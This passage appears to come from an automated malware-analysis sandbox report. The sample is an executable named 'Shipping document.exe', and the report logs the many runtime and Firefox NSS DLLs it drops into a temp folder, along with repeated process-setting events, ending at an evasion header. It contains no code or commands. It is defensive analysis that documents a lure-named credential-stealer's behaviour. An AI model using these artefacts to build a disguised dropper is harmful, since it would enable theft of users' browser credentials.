            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\mozglue.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\softokn3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\msvcp140.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\freebl3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\nssdbm3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\nss3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\mozglue.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\softokn3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion: